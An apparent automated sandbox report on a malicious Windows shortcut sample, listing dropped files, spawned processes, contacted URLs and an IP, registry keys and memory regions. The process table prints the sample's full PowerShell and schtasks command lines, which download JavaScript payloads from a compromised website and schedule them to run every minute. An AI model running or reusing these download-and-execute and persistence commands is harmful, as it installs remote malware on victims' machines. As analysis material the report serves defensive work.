Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
6K2g0GMmIE.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:55 2024, atime=Mon Apr 8
20:19:11 2024, length=455680, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\M77M75P1ZQW1.js
|
ASCII text, with very long lines (398)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_115qz1dn.1oh.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lwfixj5.m1e.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eov0qpyo.kup.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fic3i2l3.tts.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwyqdzms.fyk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idighnof.pa5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_np3u5lu3.wb2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wh45t2ag.5ym.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TO3EHBI6S3OLBG1DPH1J.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a1f0dc316e092dfa.customDestinations-ms (copy)
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php');
$NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js');
schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js
' * 2)) /tn 48dYPKZW1;
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js
7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js
"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js
"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\M77M75P1ZQW1.js
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\M77M75P1ZQW1.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\M77M75P1ZQW1.js
"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.italialife24.it
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
|
46.254.34.201
|
|
|
|
https://www.italialife24.it/
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/0
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
|
46.254.34.201
|
|
|
|
https://www.italialife24.it/wp-content/upl
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
|
46.254.34.201
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.microsoft.
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
|
unknown
|
||
|
https://go.microsl
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phgD
|
unknown
|
||
|
http://www.microsoft.pki/
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://italialife24.it
|
unknown
|
||
|
http://www.italialife24.it
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
italialife24.it
|
46.254.34.201
|
|
|
|
www.italialife24.it
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
46.254.34.201
|
italialife24.it
|
Italy
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
19198DBD000
|
trusted library allocation
|
page read and write
|
||
|
18E6DFE000
|
stack
|
page read and write
|
||
|
BE878FA000
|
stack
|
page read and write
|
||
|
4AF3D7E000
|
stack
|
page read and write
|
||
|
4AF3E7B000
|
stack
|
page read and write
|
||
|
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
|
19196370000
|
heap
|
page read and write
|
||
|
25C6768D000
|
heap
|
page read and write
|
||
|
227302D4000
|
trusted library allocation
|
page read and write
|
||
|
5853E0E000
|
stack
|
page read and write
|
||
|
19198205000
|
trusted library allocation
|
page read and write
|
||
|
17A22B40000
|
trusted library allocation
|
page read and write
|
||
|
17A24889000
|
trusted library allocation
|
page read and write
|
||
|
2F284682000
|
heap
|
page read and write
|
||
|
27F6D5BD000
|
heap
|
page read and write
|
||
|
22746E75000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
19198071000
|
heap
|
page read and write
|
||
|
227305A7000
|
trusted library allocation
|
page read and write
|
||
|
25C6769C000
|
heap
|
page read and write
|
||
|
2F284656000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
15ECF3DB000
|
heap
|
page read and write
|
||
|
4AF33EE000
|
stack
|
page read and write
|
||
|
20D90950000
|
heap
|
page read and write
|
||
|
2F284510000
|
heap
|
page read and write
|
||
|
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
|
4AF3BFC000
|
stack
|
page read and write
|
||
|
2DF167F000
|
stack
|
page read and write
|
||
|
2F2845F0000
|
heap
|
page read and write
|
||
|
2BB94704000
|
heap
|
page read and write
|
||
|
15BEC0AE000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
585414C000
|
stack
|
page read and write
|
||
|
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
|
15BEE264000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
55A9ACF000
|
stack
|
page read and write
|
||
|
2BB946B9000
|
heap
|
page read and write
|
||
|
2BB948DD000
|
heap
|
page read and write
|
||
|
15BEC09A000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
5853E8E000
|
stack
|
page read and write
|
||
|
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
|
55A9C4B000
|
stack
|
page read and write
|
||
|
15BEC08E000
|
heap
|
page read and write
|
||
|
2BB946E6000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
2272E795000
|
heap
|
page read and write
|
||
|
2272CB20000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
58540CF000
|
stack
|
page read and write
|
||
|
25C6763B000
|
heap
|
page read and write
|
||
|
4AF377E000
|
stack
|
page read and write
|
||
|
25C67689000
|
heap
|
page read and write
|
||
|
15B80076000
|
trusted library allocation
|
page read and write
|
||
|
2272CB28000
|
heap
|
page read and write
|
||
|
15BEC0D5000
|
heap
|
page read and write
|
||
|
15ECF3CE000
|
heap
|
page read and write
|
||
|
2272EEFC000
|
trusted library allocation
|
page read and write
|
||
|
15ECF725000
|
heap
|
page read and write
|
||
|
25C676B7000
|
heap
|
page read and write
|
||
|
7B10F7E000
|
stack
|
page read and write
|
||
|
22746E82000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
25C676AA000
|
heap
|
page read and write
|
||
|
191962B0000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
2BB948D5000
|
heap
|
page read and write
|
||
|
15ECF3DA000
|
heap
|
page read and write
|
||
|
22746CF0000
|
heap
|
page read and write
|
||
|
7B11178000
|
stack
|
page read and write
|
||
|
1F5CBBD0000
|
heap
|
page read and write
|
||
|
191A8205000
|
trusted library allocation
|
page read and write
|
||
|
55A9B4E000
|
stack
|
page read and write
|
||
|
55A8BF9000
|
stack
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
15BEE23A000
|
heap
|
page read and write
|
||
|
27F6D7DC000
|
heap
|
page read and write
|
||
|
1F5CBC58000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
27F6D58E000
|
heap
|
page read and write
|
||
|
BE87FFD000
|
stack
|
page read and write
|
||
|
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
|
15ECF42B000
|
heap
|
page read and write
|
||
|
15B81853000
|
trusted library allocation
|
page read and write
|
||
|
25C6766E000
|
heap
|
page read and write
|
||
|
27F6D546000
|
heap
|
page read and write
|
||
|
2272CA80000
|
heap
|
page read and write
|
||
|
17A21198000
|
heap
|
page read and write
|
||
|
55A9A0E000
|
stack
|
page read and write
|
||
|
15BEDF10000
|
heap
|
page read and write
|
||
|
2BB946E6000
|
heap
|
page read and write
|
||
|
15BEDFDD000
|
heap
|
page read and write
|
||
|
25C67689000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
FE18DFF000
|
stack
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
191A833B000
|
trusted library allocation
|
page read and write
|
||
|
2272F94C000
|
trusted library allocation
|
page read and write
|
||
|
4AF3A78000
|
stack
|
page read and write
|
||
|
21229A60000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
25C67682000
|
heap
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2272CBAB000
|
heap
|
page read and write
|
||
|
17A3B2E4000
|
heap
|
page read and write
|
||
|
21229D44000
|
heap
|
page read and write
|
||
|
15ED0E04000
|
heap
|
page read and write
|
||
|
227302D0000
|
trusted library allocation
|
page read and write
|
||
|
17A3B3F7000
|
heap
|
page execute and read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
17A23612000
|
trusted library allocation
|
page read and write
|
||
|
8981FFB000
|
stack
|
page read and write
|
||
|
2BB946E6000
|
heap
|
page read and write
|
||
|
19199768000
|
trusted library allocation
|
page read and write
|
||
|
18E6AFF000
|
stack
|
page read and write
|
||
|
19196278000
|
heap
|
page read and write
|
||
|
55A9CCE000
|
stack
|
page read and write
|
||
|
2272CDB0000
|
trusted library allocation
|
page read and write
|
||
|
15ECF40D000
|
heap
|
page read and write
|
||
|
25C67682000
|
heap
|
page read and write
|
||
|
1F5CBF55000
|
heap
|
page read and write
|
||
|
5853FCF000
|
stack
|
page read and write
|
||
|
15BEC010000
|
trusted library allocation
|
page read and write
|
||
|
15B901B3000
|
trusted library allocation
|
page read and write
|
||
|
25C67692000
|
heap
|
page read and write
|
||
|
15ECF3BD000
|
heap
|
page read and write
|
||
|
15ECF3F5000
|
heap
|
page read and write
|
||
|
2272EB44000
|
heap
|
page read and write
|
||
|
2BB963C0000
|
heap
|
page read and write
|
||
|
21229AD9000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
17A22B10000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
15B815F4000
|
trusted library allocation
|
page read and write
|
||
|
15BEBFF5000
|
heap
|
page read and write
|
||
|
17A3B564000
|
heap
|
page read and write
|
||
|
27F6D53D000
|
heap
|
page read and write
|
||
|
15B9007D000
|
trusted library allocation
|
page read and write
|
||
|
2273ED47000
|
trusted library allocation
|
page read and write
|
||
|
191B0329000
|
heap
|
page read and write
|
||
|
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
22746DE0000
|
heap
|
page read and write
|
||
|
1F5CBC5E000
|
heap
|
page read and write
|
||
|
8981DFD000
|
stack
|
page read and write
|
||
|
25C6766F000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
25C67689000
|
heap
|
page read and write
|
||
|
19198030000
|
trusted library allocation
|
page read and write
|
||
|
FE18CFF000
|
stack
|
page read and write
|
||
|
22746E7D000
|
heap
|
page read and write
|
||
|
22746DEE000
|
heap
|
page read and write
|
||
|
25C6765E000
|
heap
|
page read and write
|
||
|
17A24E8D000
|
trusted library allocation
|
page read and write
|
||
|
BE87EFF000
|
stack
|
page read and write
|
||
|
55A9BCC000
|
stack
|
page read and write
|
||
|
15ECF3FD000
|
heap
|
page read and write
|
||
|
27F6D56B000
|
heap
|
page read and write
|
||
|
2272CB46000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5853F0D000
|
stack
|
page read and write
|
||
|
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
|
15BEDD2F000
|
heap
|
page read and write
|
||
|
2BB9470C000
|
heap
|
page read and write
|
||
|
15ECF3CF000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
15ECF3D5000
|
heap
|
page read and write
|
||
|
2272CD30000
|
heap
|
page readonly
|
||
|
27F6D58E000
|
heap
|
page read and write
|
||
|
15B8160A000
|
trusted library allocation
|
page read and write
|
||
|
15B81643000
|
trusted library allocation
|
page read and write
|
||
|
15B81C20000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
27F6D53C000
|
heap
|
page read and write
|
||
|
2F284628000
|
heap
|
page read and write
|
||
|
7B10E7D000
|
stack
|
page read and write
|
||
|
27F6D4C0000
|
heap
|
page read and write
|
||
|
2BB9472A000
|
heap
|
page read and write
|
||
|
15ECF3E0000
|
heap
|
page read and write
|
||
|
1919979A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
27F6D53A000
|
heap
|
page read and write
|
||
|
17A24891000
|
trusted library allocation
|
page read and write
|
||
|
55A88FE000
|
stack
|
page read and write
|
||
|
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
|
58533BB000
|
stack
|
page read and write
|
||
|
4AF3CFE000
|
stack
|
page read and write
|
||
|
15BEC096000
|
heap
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
191B0216000
|
heap
|
page execute and read and write
|
||
|
17A24867000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
191962B6000
|
heap
|
page read and write
|
||
|
4AF38FE000
|
stack
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B11F0E000
|
stack
|
page read and write
|
||
|
2273ECD1000
|
trusted library allocation
|
page read and write
|
||
|
17A22CE9000
|
heap
|
page read and write
|
||
|
191963A0000
|
heap
|
page read and write
|
||
|
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
|
25C693B0000
|
heap
|
page read and write
|
||
|
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C67689000
|
heap
|
page read and write
|
||
|
2F284678000
|
heap
|
page read and write
|
||
|
6F683FE000
|
stack
|
page read and write
|
||
|
27F6D575000
|
heap
|
page read and write
|
||
|
15ECF3D9000
|
heap
|
page read and write
|
||
|
15B815F6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
|
25C67682000
|
heap
|
page read and write
|
||
|
7B1127E000
|
stack
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
191962CE000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
898133A000
|
stack
|
page read and write
|
||
|
1F5CBBF0000
|
heap
|
page read and write
|
||
|
17A210A0000
|
heap
|
page read and write
|
||
|
2272CD10000
|
trusted library allocation
|
page read and write
|
||
|
7B1208E000
|
stack
|
page read and write
|
||
|
15B81C24000
|
trusted library allocation
|
page read and write
|
||
|
BE5F1FE000
|
stack
|
page read and write
|
||
|
15ECF42B000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
7B1200D000
|
stack
|
page read and write
|
||
|
25C67647000
|
heap
|
page read and write
|
||
|
2F28467B000
|
heap
|
page read and write
|
||
|
2272EBB0000
|
heap
|
page read and write
|
||
|
25C693B9000
|
heap
|
page read and write
|
||
|
5853078000
|
stack
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
BE5F0FB000
|
stack
|
page read and write
|
||
|
15B81608000
|
trusted library allocation
|
page read and write
|
||
|
18E67FE000
|
stack
|
page read and write
|
||
|
89816FE000
|
stack
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
2DF1369000
|
stack
|
page read and write
|
||
|
17A22CD0000
|
heap
|
page read and write
|
||
|
15ECF3FD000
|
heap
|
page read and write
|
||
|
17A21040000
|
heap
|
page read and write
|
||
|
2272EB69000
|
heap
|
page read and write
|
||
|
17A22BD0000
|
trusted library allocation
|
page read and write
|
||
|
191B02C2000
|
heap
|
page read and write
|
||
|
25C6764F000
|
heap
|
page read and write
|
||
|
25C67682000
|
heap
|
page read and write
|
||
|
20D90C60000
|
heap
|
page read and write
|
||
|
15ECF3CD000
|
heap
|
page read and write
|
||
|
17A3B500000
|
heap
|
page read and write
|
||
|
20D90930000
|
heap
|
page read and write
|
||
|
27F6D58E000
|
heap
|
page read and write
|
||
|
2BB945B0000
|
heap
|
page read and write
|
||
|
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
|
17A333D3000
|
trusted library allocation
|
page read and write
|
||
|
25C67618000
|
heap
|
page read and write
|
||
|
17A3B220000
|
heap
|
page read and write
|
||
|
15BEC094000
|
heap
|
page read and write
|
||
|
15BEDEA0000
|
heap
|
page execute and read and write
|
||
|
2273ED3B000
|
trusted library allocation
|
page read and write
|
||
|
17A33230000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
2272E790000
|
heap
|
page read and write
|
||
|
55A8D3E000
|
stack
|
page read and write
|
||
|
15ECF720000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
15BEDFE0000
|
heap
|
page read and write
|
||
|
55A89FE000
|
stack
|
page read and write
|
||
|
15BEE229000
|
heap
|
page read and write
|
||
|
15ED2D60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B112FE000
|
stack
|
page read and write
|
||
|
15ECF3A1000
|
heap
|
page read and write
|
||
|
2F284648000
|
heap
|
page read and write
|
||
|
27F6D546000
|
heap
|
page read and write
|
||
|
191B0290000
|
heap
|
page read and write
|
||
|
17A24E89000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BB9471B000
|
heap
|
page read and write
|
||
|
19196485000
|
heap
|
page read and write
|
||
|
18E66FE000
|
stack
|
page read and write
|
||
|
15BEBFF0000
|
heap
|
page read and write
|
||
|
191B05FE000
|
heap
|
page read and write
|
||
|
4F3337F000
|
unkown
|
page read and write
|
||
|
15ECF3CD000
|
heap
|
page read and write
|
||
|
17A23221000
|
trusted library allocation
|
page read and write
|
||
|
BE879FE000
|
stack
|
page read and write
|
||
|
227302B1000
|
trusted library allocation
|
page read and write
|
||
|
17A3B24A000
|
heap
|
page read and write
|
||
|
27F6D7D0000
|
heap
|
page read and write
|
||
|
2272ECD1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
7B11E4E000
|
stack
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
19199DB2000
|
trusted library allocation
|
page read and write
|
||
|
17A21100000
|
heap
|
page read and write
|
||
|
2F284695000
|
heap
|
page read and write
|
||
|
191994D4000
|
trusted library allocation
|
page read and write
|
||
|
25C67530000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
17A21360000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
191B05F2000
|
heap
|
page read and write
|
||
|
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
|
191B05B0000
|
heap
|
page read and write
|
||
|
15ECF407000
|
heap
|
page read and write
|
||
|
191962FA000
|
heap
|
page read and write
|
||
|
15ECF3F5000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
|
15BEDEC0000
|
heap
|
page execute and read and write
|
||
|
191964B0000
|
heap
|
page execute and read and write
|
||
|
15ECF3BE000
|
heap
|
page read and write
|
||
|
17A248D7000
|
trusted library allocation
|
page read and write
|
||
|
25C69064000
|
heap
|
page read and write
|
||
|
227308ED000
|
trusted library allocation
|
page read and write
|
||
|
5852E7D000
|
stack
|
page read and write
|
||
|
7B109DE000
|
stack
|
page read and write
|
||
|
7B111FC000
|
stack
|
page read and write
|
||
|
15ECF3A7000
|
heap
|
page read and write
|
||
|
2F284885000
|
heap
|
page read and write
|
||
|
7B10D7F000
|
stack
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
191B05C0000
|
heap
|
page read and write
|
||
|
19196240000
|
heap
|
page read and write
|
||
|
7B10C72000
|
stack
|
page read and write
|
||
|
7B11ECD000
|
stack
|
page read and write
|
||
|
15ECF41A000
|
heap
|
page read and write
|
||
|
19199A0D000
|
trusted library allocation
|
page read and write
|
||
|
19199788000
|
trusted library allocation
|
page read and write
|
||
|
17A21138000
|
heap
|
page read and write
|
||
|
1919976D000
|
trusted library allocation
|
page read and write
|
||
|
191B05F8000
|
heap
|
page read and write
|
||
|
15B80C2C000
|
trusted library allocation
|
page read and write
|
||
|
17A24918000
|
trusted library allocation
|
page read and write
|
||
|
2BB946DB000
|
heap
|
page read and write
|
||
|
4AF33A5000
|
stack
|
page read and write
|
||
|
4AF397E000
|
stack
|
page read and write
|
||
|
227308F1000
|
trusted library allocation
|
page read and write
|
||
|
15B815D9000
|
